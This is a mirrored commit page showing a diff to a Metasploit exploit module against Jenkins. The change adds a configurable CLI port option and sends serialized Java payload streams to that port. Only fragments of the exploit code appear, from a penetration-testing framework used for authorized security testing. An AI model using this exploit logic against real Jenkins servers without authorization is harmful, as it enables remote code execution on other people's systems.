mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Land #6549, module option for X-Jenkins-CLI-Port
This commit is contained in:
commit
5b3fb99231
@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
|
||||
Opt::RPORT('8080')
|
||||
], self.class)
|
||||
|
||||
register_advanced_options([
|
||||
OptPort.new('XJenkinsCliPort', [false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def cli_port
|
||||
@jenkins_cli_port || datastore['XJenkinsCliPort']
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless vulnerable?
|
||||
if cli_port == 0 && !vulnerable?
|
||||
fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
|
||||
end
|
||||
invoke_remote_method(set_payload)
|
||||
@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def invoke_remote_method(serialized_java_stream)
|
||||
begin
|
||||
socket = connect(true, {'RPORT' => @jenkins_cli_port})
|
||||
socket = connect(true, {'RPORT' => cli_port})
|
||||
|
||||
print_status 'Sending headers...'
|
||||
socket.put(read_bin_file('serialized_jenkins_header'))
|
||||
|
Loading…
Reference in New Issue
Block a user